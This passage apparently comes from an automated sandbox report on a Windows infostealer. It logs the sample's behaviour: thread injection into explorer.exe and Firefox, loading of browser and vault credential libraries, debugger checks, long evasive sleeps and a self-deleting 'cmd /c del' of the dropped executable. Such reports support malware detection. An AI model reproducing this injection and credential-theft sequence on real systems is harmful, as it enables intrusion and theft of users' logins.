| Queue APC | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Set Context | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Resume | c:\windows\explorer.exe | os_tid = 0x3a0 |
|
1 | |
| Resume | c:\windows\syswow64\wscript.exe | os_tid = 0xb0 |
|
1 |
Memory (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | address = 0xfffde000, size = 32 |
|
1 | |
| Read | C:\Program Files (x86)\Mozilla Firefox\Firefox.exe | address = 0x9e0000, size = 278528 |
|
1 |
Module (19)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | crypt32.dll | base_address = 0x0 |
|
1 | |
| Load | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | base_address = 0xc0000135 |
|
1 | |
| Load | winsqlite3.dll | base_address = 0xc0000135 |
|
1 | |
| Load | vaultcli.dll | base_address = 0x0 |
|
1 | |
| Load | gdiplus.dll | base_address = 0x0 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1828856 |
|
1 | |
| Create Mapping | - | protection = PAGE_READWRITE, maximum_size = 1827444 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1825088 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1826904 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1826956 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c0000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_READWRITE, address_out = 0x2450000 |
|
1 | |
| Map | - | process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x45b0000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xba0000 |
|
1 | |
| Map | - | process_name = C:\Program Files (x86)\Mozilla Firefox\Firefox.exe, protection = PAGE_READWRITE, address_out = 0xa30000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x32e0000 |
|
1 | |
| Map | - | process_name = C:\Program Files (x86)\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xb0000 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\cmstp.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x30b0000 |
|
1 | |
| Map | - | process_name = C:\Program Files (x86)\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x9e0000 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (33)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1828896 milliseconds (1828.896 seconds) |
|
15 | |
| Sleep | duration = 1828896 milliseconds (1828.896 seconds) |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
17 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = 598MPR44-CZEWG7B, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Create | mutex_name = 2151P0RSCS468WZz, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Mozilla Firefox, environment = 0 |
|
1 | |
| Set Environment String | name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\, environment = 0 |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\windows\syswow64\cmstp.exe | - |
|
1 |
Process #23: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c del "C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb70 |
| Parent PID | 0x9cc (c:\windows\syswow64\cmstp.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x004dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e40000 | 0x01e40000 | 0x02182fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x4a3b0000 | 0x4a3fbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75680000 | 0x75686fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (14)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a3b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-27 09:38:34 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 226451 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #29: officeclicktorun.exe
0
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe |
| Command Line | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /user |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:35, Reason: Child Process |
| Unmonitor | End Time: 00:04:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:55 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x52c |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
41C
0x
9B8
0x
2B0
0x
738
0x
9C0
0x
8F8
0x
9BC
0x
540
0x
8FC
0x
7B8
0x
594
0x
4F8
0x
AA8
0x
6C0
0x
6E4
0x
980
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00042fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00066fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00290000 | 0x002f6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00300fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00331fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00790fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x01b9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ba0000 | 0x01ba0000 | 0x01f92fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01fa0000 | 0x0226efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0252ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002530000 | 0x02530000 | 0x0260efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002710000 | 0x02710000 | 0x0280ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a30000 | 0x02a30000 | 0x02b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e10000 | 0x02e10000 | 0x02f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003040000 | 0x03040000 | 0x0313ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003140000 | 0x03140000 | 0x03482fff | Pagefile Backed Memory | r |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| officeclicktorun.exe | 0x13f820000 | 0x13ff87fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7fef6100000 | 0x7fef62f1fff | Memory Mapped File | rwx |
|
|
|
- |
| apiclient.dll | 0x7fef7a40000 | 0x7fef7ab5fff | Memory Mapped File | rwx |
|
|
|
- |
| rstrtmgr.dll | 0x7fef7ac0000 | 0x7fef7af2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-utility-l1-1-0.dll | 0x7fef7b00000 | 0x7fef7b02fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-environment-l1-1-0.dll | 0x7fef7b10000 | 0x7fef7b12fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-filesystem-l1-1-0.dll | 0x7fef7b20000 | 0x7fef7b22fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-time-l1-1-0.dll | 0x7fef7b30000 | 0x7fef7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-multibyte-l1-1-0.dll | 0x7fef7b40000 | 0x7fef7b44fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-math-l1-1-0.dll | 0x7fef7b50000 | 0x7fef7b54fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-locale-l1-1-0.dll | 0x7fef7b60000 | 0x7fef7b62fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7fef7b70000 | 0x7fef7c0cfff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-convert-l1-1-0.dll | 0x7fef7c10000 | 0x7fef7c13fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-stdio-l1-1-0.dll | 0x7fef7c20000 | 0x7fef7c23fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-heap-l1-1-0.dll | 0x7fef7c30000 | 0x7fef7c32fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-string-l1-1-0.dll | 0x7fef7c40000 | 0x7fef7c43fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-file-l1-2-0.dll | 0x7fef7c50000 | 0x7fef7c52fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-processthreads-l1-1-1.dll | 0x7fef7c60000 | 0x7fef7c62fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x7fef7c70000 | 0x7fef7c72fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-localization-l1-2-0.dll | 0x7fef7c80000 | 0x7fef7c82fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-file-l2-1-0.dll | 0x7fef7c90000 | 0x7fef7c92fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-timezone-l1-1-0.dll | 0x7fef7ca0000 | 0x7fef7ca2fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7fef7cb0000 | 0x7fef7da1fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-runtime-l1-1-0.dll | 0x7fef7db0000 | 0x7fef7db3fff | Memory Mapped File | rwx |
|
|
|
- |
| vcruntime140.dll | 0x7fef7dc0000 | 0x7fef7dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7fef7de0000 | 0x7fef7dfafff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x7fefa530000 | 0x7fefa74cfff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x7fefa750000 | 0x7fefaa65fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb680000 | 0x7fefb6a6fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7fefbee0000 | 0x7fefbef0fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7fefc040000 | 0x7fefc074fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefc080000 | 0x7fefc097fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x7fefd080000 | 0x7fefd089fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7fefd5f0000 | 0x7fefd611fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7fefd620000 | 0x7fefd66dfff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7fefda20000 | 0x7fefda2afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7fefdd20000 | 0x7fefdd59fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7fefee30000 | 0x7fefee7cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7fefee80000 | 0x7feff0d8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x7feff6e0000 | 0x7feff857fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x7feff870000 | 0x7feff999fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
